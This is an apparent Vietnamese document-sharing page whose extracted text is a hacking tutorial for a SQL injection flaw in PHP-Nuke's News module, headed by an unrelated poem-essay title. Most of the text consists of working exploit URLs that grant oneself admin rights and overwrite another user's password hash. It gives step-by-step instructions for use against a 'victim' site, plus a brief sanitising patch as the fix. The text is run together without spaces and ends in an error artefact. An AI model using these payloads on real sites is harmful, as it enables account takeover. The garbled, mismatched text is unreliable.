Phân tích tư tưởng của nhân dân qua đoạn thơ: Những người vợ nhớ chồng… Những cuộc đời đã hóa sông núi ta trong Đất nước của Nguyễn Khoa Điềm
3440
1
0
9 trang
Tham khảo tài liệu lỗi trong php, công nghệ thông tin, an ninh - bảo mật phục vụ nhu cầu học tập, nghiên cứu và làm việc hiệu quả
Nội dung trích xuất từ tài liệu:
Lỗi trong PHP.LỗitrongPHPNukechophépđạtquyềnAdmin,thayđổipassuserkhác:trangnàyđãđượcđọc lầnPHPNukecómộtlổhổngbảomậtchophépcácattackersửdụngPHPNukesNewsmoduleđểchèncáccâulệnhSQLnguyhiểmvào,cóquyềnAdmin,sửapassword…CácphiênbảnPHPNukebịlỗi:PHPNuke5.6,6.0,6.5RC1,6.5RC2,6.5RC3,và6.5Khaithác1/Thayđổicấpbậc(settoAdmin):Sửdụnglinksau:http://[target]/modules.php?name=News&file=article&sid=1&save=1&mode=,user_level=4KhitasửdụngnhữngURLtrênthìnósẽlàmthayđổicấutrúccáccâulệnhSQL:UPDATEnuke_usersSETumode=111,uorder=111,thold=111whereuid=1526Thành:UPDATEnuke_usersSETumode=,user_level=4,uorder=111,thold=111whereuid=1526CâulệnhtrênđãsetmộtngườidùngcóUIDlà1526từmộtcấpbấtkìlêncấp4.HehehenósẽchotanhữngđặcquyềncaocấpcủaAdmin(level4làcấpcủaAdminmừ:D).Đểchắcănlàthànhcông,bạnnênđăngnhậpvàohệthốngđó(nhằmcóđượcuid=’****’hiệnthờiđangtruycậpcơsởdữliệucủavictimđểmàsetlênAdminchứ)2/ThayđổiPasswordcủamộtngườinàođó.Sữdụnglinksau:http://[target]/modules.php?name=News&file=article&sid=1&save=1&order=,pass=d41d8cd98f00b204e9800998ecf8427e%20where%20uname=Bob/*URLtrênchophéptađổipasswordcủamộtnườidùngtênBobthànhd41d8cd98f00b204e9800998ecf8427evìkhithựchiệndòngURLnàythìnhữngcâulệnhcủaSQLtừ:UPDATEnuke_usersSETumode=111,uorder=,pass=d41d8cd98f00b204e9800998ecf8427e, thold=111whereuid=1526Thành:UPDATEnuke_usersSETumode=111,uorder=,pass=d41d8cd98f00b204e9800998ecf8427e whereuname=Bob/*,thold=111whereuid=1526Passwordđượcđổimộtcáchngonơ.:DKhắcphụcTrongtậptinmainfile.phpsữanhữngdòngsau:[...]foreach($_GETas$secvalue){if((eregi(]*script*\?[^>]*>,$secvalue))||(eregi(]*object*\?[^>]*>,$secvalue))||(eregi(\.\.,$secvalue))||(eregi(]*iframe*\?[^>]*>,$secvalue))||(eregi(]*applet*\?[^>]*>,$secvalue))||(eregi(]*meta*\?[^>]*>,$secvalue))||(eregi(]*style*\?[^>]*>,$secvalue))||(eregi(]*form*\?[^>]*>,$secvalue))||(eregi(]*img*\?[^>]*>,$secvalue))||(eregi(\([^>]*\?[^)]*\),$secvalue))||(eregi(\,$secvalue))){Header(Location:);die();}}foreach($_POSTas$secvalue){if(eregi(]*script*\?[^>]*>,$secvalue)){Header(Location:);die();}}[...]Thành:foreach($_REQUESTas$key=>$value){if(get_magic_quotes_gpc()==0){$value=addslashes($value);//Thiswillreproducetheoptionmagic_quotes_gpc=1}$value=str_replace(array(),=,,|),array(),=,,|),$value);${$key}=$value;$_REQUEST[$key]=$value;if(isset($_POST[$key])){$_POST[$key]=$value;}if(isset($_COOKIE[$key])){$_COOKIE[$key]=$value;}if(isset($_FILE[$key])){$_FILE[$key]=$value;}if(isset($_GET[$key])){$_GET[$key]=$value;}if(isset($HTTP_POST_VARS[$key])){$HTTP_POST_VARS[$key]=$value;}if(isset($HTTP_COOKIE_VARS[$key])){$HTTP_COOKIE_VARS[$key]=$value;}if(isset($HTTP_FILE_VARS[$key])){$HTTP_FILE_VARS[$key]=$value;}if(isset($HTTP_GET_VARS[$key])){$HTTP_GET_VARS[$key]=$value;}}Hackvuivẻ…ChúÝ:Đểthựchiệnđượcphươngpháptấncôngnàybạnlàmtheomấybướcsau:1/Đăngkílàmthànhviênởtrangcủavictim.2/Đăngnhậpvàtrangđóvớitàikhoảnvừatạo.3/CopylinkcủatôitrongbàitrênviếtđểtựsetmìnhlênAdmin(Phảiđăngnhậptrướckhithựchiện)Vậylàxong... Error!Unknownswitchargument.
